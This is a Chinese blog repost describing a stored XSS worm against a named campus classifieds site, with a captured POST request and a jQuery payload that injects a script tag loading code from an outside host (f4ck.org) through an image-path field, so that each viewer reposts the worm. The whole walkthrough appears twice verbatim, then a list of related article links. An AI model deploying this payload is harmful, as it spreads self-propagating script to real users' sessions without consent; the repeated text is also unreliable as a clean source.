XSS蠕虫攻击案例学习
2014-04-14 11:24
99 查看
(1)看了下网站基于jQuery,那构造一个xss worm就简单很多(没有也无所谓,我们自己加载进去也可以的)
(2)我们来看看发帖的post动作,我们有burp截取一段数据包看看
POST /info/UserInfo/modifyInfo HTTP/1.1
Host: swust.0xiao.com
......
Cookie: no
'info_sort_id=178&title=全新红米NOTE手机出售!!!!&content=漏洞测试by:yueyan&pic_path=/Public/upload/info/201404/thumb_534517bb38d6a.jpg
于是我们就构造这样一段ajax_post参数。
具体所涉及知识点请移步到http://www.w3school.com.cn/jquery/ajax_post.asp
$.post("/info/UserInfo/modifyInfo",{'info_sort_id':'178','title':'全新红米NOTE手机出售!!!!','content':'漏洞测试by:yueyan','pic_path':'/Public/upload/info/201404/thumb_534517bb38d6a.jpg"></img><script src=http://f4ck.org/1111></script>',},function(data, textStaus){alert('yueyan');});
找个xss平台,我这里随便找了个,把上面代码放进去,我这里地址是 http://f4ck.org/1111发帖出去后,一旦有用户登录这个网站,并且查看了该信息,就会触发http://f4ck.org/1111中的代码 $.post("/info/UserInfo/modifyInfo",{'info_sort_id':'178','title':'全新红米NOTE手机出售!!!!','content':'漏洞测试by:yueyan','pic_path':'/Public/upload/info/201404/thumb_534517bb38d6a.jpg"></img><script src=http://f4ck.org/1111></script>',},function(data, textStaus){alert('yueyan');});触发后,用户的动作即为发出一个和我发的一样的有xss
worm代码的信息,慢慢的慢慢的就可以传播开了。如图:
转自:http://sb.f4ck.org/thread-18030-1-1.html
(2)我们来看看发帖的post动作,我们有burp截取一段数据包看看
POST /info/UserInfo/modifyInfo HTTP/1.1
Host: swust.0xiao.com
......
Cookie: no
'info_sort_id=178&title=全新红米NOTE手机出售!!!!&content=漏洞测试by:yueyan&pic_path=/Public/upload/info/201404/thumb_534517bb38d6a.jpg
于是我们就构造这样一段ajax_post参数。
具体所涉及知识点请移步到http://www.w3school.com.cn/jquery/ajax_post.asp
$.post("/info/UserInfo/modifyInfo",{'info_sort_id':'178','title':'全新红米NOTE手机出售!!!!','content':'漏洞测试by:yueyan','pic_path':'/Public/upload/info/201404/thumb_534517bb38d6a.jpg"></img><script src=http://f4ck.org/1111></script>',},function(data, textStaus){alert('yueyan');});
找个xss平台,我这里随便找了个,把上面代码放进去,我这里地址是 http://f4ck.org/1111发帖出去后,一旦有用户登录这个网站,并且查看了该信息,就会触发http://f4ck.org/1111中的代码 $.post("/info/UserInfo/modifyInfo",{'info_sort_id':'178','title':'全新红米NOTE手机出售!!!!','content':'漏洞测试by:yueyan','pic_path':'/Public/upload/info/201404/thumb_534517bb38d6a.jpg"></img><script src=http://f4ck.org/1111></script>',},function(data, textStaus){alert('yueyan');});触发后,用户的动作即为发出一个和我发的一样的有xss
worm代码的信息,慢慢的慢慢的就可以传播开了。如图:
转自:http://sb.f4ck.org/thread-18030-1-1.html
相关文章推荐
- 【安全牛学习笔记】XSS-简介、跨站脚本检测和常见的攻击利用手段
- XSS学习笔记(二)(存储型XSS,持久型攻击)
- 2014年03月09日攻击百度贴吧的XSS蠕虫源码
- XSS学习笔记(二)(存储型XSS,持久型攻击)
- XSS学习笔记(六)-XSS蠕虫
- 【安全牛学习笔记】手动漏洞挖掘-SQL注入XSS-简介、跨站脚本检测和常见的攻击利用手段
- 【安全牛学习笔记】XSS-简介、跨站脚本检测和常见的攻击利用手段
- 【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架
- django学习——常见的网站攻击的三种方式:sql注入、xss、csrf
- 案例!使用CSP防止XSS 攻击入门
- java学习记录--ThreadLocal使用案例
- Android(java)学习笔记85:案例拨号程序
- Ibatis基础学习案例
- 学习C#基础必看案例
- javaScript学习笔记 No.2 -- 案例研究-美术馆
- ajax入门学习(三)小案例Demo2
- 实用:防止SQL、XSS等注入攻击的Filter
- 作业——在线学习Android课程之第十三周(视图优化案例)
- C语言学习笔记之 第五讲:C语言弹窗打开一个exe,文件,网站案例
- MapReduce案例学习(4) 求各个城市的员工的总工资